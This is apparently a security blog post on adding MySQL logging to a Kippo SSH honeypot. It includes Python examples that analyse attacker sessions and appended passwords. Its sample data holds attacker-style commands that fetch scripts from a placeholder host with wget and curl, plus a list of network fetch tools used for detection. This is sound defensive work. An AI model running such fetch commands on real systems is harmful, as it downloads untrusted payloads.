7MS #174: DIY SSH Honeypot with Kippo - Part 2
In this episode I took my Kippo installation to the next step by incorporating MySQL. The first thing I did was connect to my MySQL instance:
mysql -u root -p
Then, I created an empty kippo database:
create database kippo;
Then I granted all permissions on the kippo database to a user called kipposql (substitute a password of your own for A-PASSWORD-YOU-PICK):
grant all on kippo.* TO 'kipposql'@'localhost' identified by 'A-PASSWORD-YOU-PICK';
Type quit to leave the mysql terminal.
Now cd to /home/kippo/kippo/doc/sql/ and import the mysql.sql file (it creates the tables Kippo logs into) by doing:
mysql -u kipposql -p -h localhost kippo < mysql.sql
(You'll be prompted for the kipposql user's password at this point.)
Now, open up the /home/kippo/kippo/kippo.cfg file, look for the [database_mysql] section, and fill it in with the appropriate info (the password must be the one you gave the kipposql user above):
host = localhost
database = kippo
username = kipposql
password = mypassword
port = 3306
Be sure to uncomment these mysql-related lines before saving your file! I didn't, so I had to do a ps x to find the kippo process (its command line contains something like ".../usr/bin/python /usr/bin/twistd -y kippo.tac...") and then kill it with kill 1906, or whatever the appropriate PID is. Then run ./start.sh to fire this baby up!
From here you can use mysql commands to query the database. More on that in future episodes.
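Here is an added example of the kind of queries worth running once Kippo is logging to MySQL; it is not from the original post or the Kippo project. It assumes the auth, input and sessions tables as Kippo's doc/sql/mysql.sql creates them (that layout is an assumption stated in the code) and rebuilds them in an in-memory SQLite database with constructed sample rows so it runs without a MySQL server; the SQL strings themselves are plain enough to paste into the mysql prompt against the real kippo database.

```python
import sqlite3

# Assumption: Kippo's sessions, auth and input tables as created by doc/sql/mysql.sql.
# Recreated in SQLite so the queries run offline; column names match the MySQL schema.
SCHEMA = """
CREATE TABLE sessions (
    id CHAR(32) PRIMARY KEY, starttime DATETIME NOT NULL, endtime DATETIME,
    sensor INTEGER NOT NULL, ip VARCHAR(15) NOT NULL DEFAULT '',
    termsize VARCHAR(7), client INTEGER);
CREATE TABLE auth (
    id INTEGER PRIMARY KEY AUTOINCREMENT, session CHAR(32) NOT NULL,
    success TINYINT NOT NULL, username VARCHAR(100) NOT NULL,
    password VARCHAR(100) NOT NULL, timestamp DATETIME NOT NULL);
CREATE TABLE input (
    id INTEGER PRIMARY KEY AUTOINCREMENT, session CHAR(32) NOT NULL,
    timestamp DATETIME NOT NULL, realm VARCHAR(50), success TINYINT,
    input TEXT NOT NULL);
"""

# Constructed sample data: two made-up attacker sessions (short ids and documentation
# IP ranges instead of Kippo's 32-character session ids and real addresses).
SAMPLE_SESSIONS = [
    ("aaaa", "2013-01-01 10:00:00", "2013-01-01 10:05:00", 1, "203.0.113.5", "80x24", 1),
    ("bbbb", "2013-01-01 11:00:00", None, 1, "198.51.100.7", "80x24", 1),
]
SAMPLE_AUTH = [  # (session, success, username, password, timestamp)
    ("aaaa", 0, "root", "password", "2013-01-01 10:00:01"),
    ("aaaa", 0, "root", "toor", "2013-01-01 10:00:02"),
    ("aaaa", 1, "root", "123456", "2013-01-01 10:00:03"),
    ("bbbb", 0, "admin", "password", "2013-01-01 11:00:01"),
    ("bbbb", 1, "root", "123456", "2013-01-01 11:00:02"),
]
SAMPLE_INPUT = [  # (session, timestamp, realm, success, input)
    ("aaaa", "2013-01-01 10:00:10", None, 1, "uname -a"),
    ("aaaa", "2013-01-01 10:00:20", None, 1, "wget http://example.invalid/x.sh"),
    ("aaaa", "2013-01-01 10:00:30", None, 1, "chmod +x x.sh"),
    ("bbbb", "2013-01-01 11:00:10", None, 1, "passwd"),
    ("bbbb", "2013-01-01 11:00:20", None, 1, "curl -O http://example.invalid/bot.pl"),
]


def open_sample_db():
    """Build the in-memory stand-in for the kippo database and load the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO sessions VALUES (?,?,?,?,?,?,?)", SAMPLE_SESSIONS)
    conn.executemany(
        "INSERT INTO auth (session, success, username, password, timestamp) "
        "VALUES (?,?,?,?,?)", SAMPLE_AUTH)
    conn.executemany(
        "INSERT INTO input (session, timestamp, realm, success, input) "
        "VALUES (?,?,?,?,?)", SAMPLE_INPUT)
    return conn


def top_passwords(conn, limit=5):
    """Most-tried passwords (successes and failures alike), as (password, count)."""
    return conn.execute(
        "SELECT password, COUNT(*) AS n FROM auth "
        "GROUP BY password ORDER BY n DESC, password").fetchmany(limit)


def successful_logins(conn):
    """Every login the honeypot accepted, joined to the session's source IP."""
    return conn.execute(
        "SELECT a.session, s.ip, a.username, a.password FROM auth a "
        "JOIN sessions s ON s.id = a.session WHERE a.success = 1 "
        "ORDER BY a.timestamp").fetchall()


def commands_for_session(conn, session_id):
    """The shell commands typed in one session, in order."""
    rows = conn.execute(
        "SELECT input FROM input WHERE session = ? ORDER BY timestamp", (session_id,))
    return [r[0] for r in rows]


# Commands whose first word is a fetch/transfer tool: the "grab a file" step the post mentions.
FETCH_TOOLS = ("wget", "curl", "nc", "netcat", "tftp", "ftp")


def download_commands(conn):
    """(session, timestamp, command) for every command that starts with a fetch tool."""
    hits = []
    for session, ts, cmd in conn.execute(
            "SELECT session, timestamp, input FROM input ORDER BY timestamp"):
        words = cmd.strip().split()
        if words and words[0] in FETCH_TOOLS:
            hits.append((session, ts, cmd))
    return hits


if __name__ == "__main__":
    db = open_sample_db()
    print("top passwords:", top_passwords(db))
    print("successful logins:", successful_logins(db))
    for session, ts, cmd in download_commands(db):
        print(f"{ts} {session}: {cmd}")
```

The join in successful_logins is the one to remember: auth only stores the session id, so the attacker's address has to come from the sessions table. Tool matching on the first word is deliberately simple; commands typed as `cd /tmp; wget ...` on one line would need the command split on `;` first.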
For now, though, another interesting file to look at is userdb.txt - this contains a username and password list for legitimate users. I left the default one in place (root/123456), and what's fun about that is that once users "hack" into the shell, all the commands they issue get captured and sucked into the mysql database too. So you can see what kinds of netcat/wget/etc. commands they run to try and grab malicious files and wreak havoc on your system!
Also, if users take advantage of the passwd command, those new passwords get appended to userdb.txt. So far, mine includes super secure passwords like toor, password, and password123.
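An added example (not code from the post or from Kippo) for keeping an eye on that file: it parses userdb.txt, separates the lines attackers appended from the shipped default, and mirrors the honeypot's login check so you can see that every appended line is now a working credential for the honeypot. The one-entry-per-line user:uid:password layout is an assumption about Kippo's format, and the file contents below are constructed.

```python
# Assumption: Kippo's userdb.txt holds one "user:uid:password" entry per line, and the
# honeypot's passwd command appends new entries in the same format.
DEFAULT_USERDB = "root:0:123456\n"

# Constructed sample: the shipped default plus three lines appended by attacker sessions.
SAMPLE_USERDB = """root:0:123456
root:0:toor

root:0:password
root:0:password123
"""


def parse_userdb(text):
    """Parse userdb.txt into (login, uid, password) tuples, rejecting malformed lines."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        # Split at most twice so a password containing ':' survives intact.
        parts = line.split(":", 2)
        if len(parts) != 3 or not parts[1].isdigit():
            raise ValueError(f"line {lineno}: expected user:uid:password, got {raw!r}")
        login, uid, password = parts
        entries.append((login, int(uid), password))
    return entries


def attacker_added(entries, default_text=DEFAULT_USERDB):
    """Entries not present in the shipped file, i.e. the ones passwd sessions appended."""
    shipped = set(parse_userdb(default_text))
    return [e for e in entries if e not in shipped]


def accepts(entries, login, password):
    """Mirror of the honeypot login check: any line with that user and password succeeds."""
    return any(u == login and p == password for u, _, p in entries)


if __name__ == "__main__":
    db = parse_userdb(SAMPLE_USERDB)
    for login, uid, password in attacker_added(db):
        print(f"appended by attacker: {login} (uid {uid}) -> {password!r}")
    print("root/toor now logs in:", accepts(db, "root", "toor"))
```

The practical point of accepts is that a honeypot whose userdb.txt keeps growing gets easier to log in to over time, since each attacker's "new" password stays valid for everyone who tries it later; if that is not what you want, prune the file and restart Kippo.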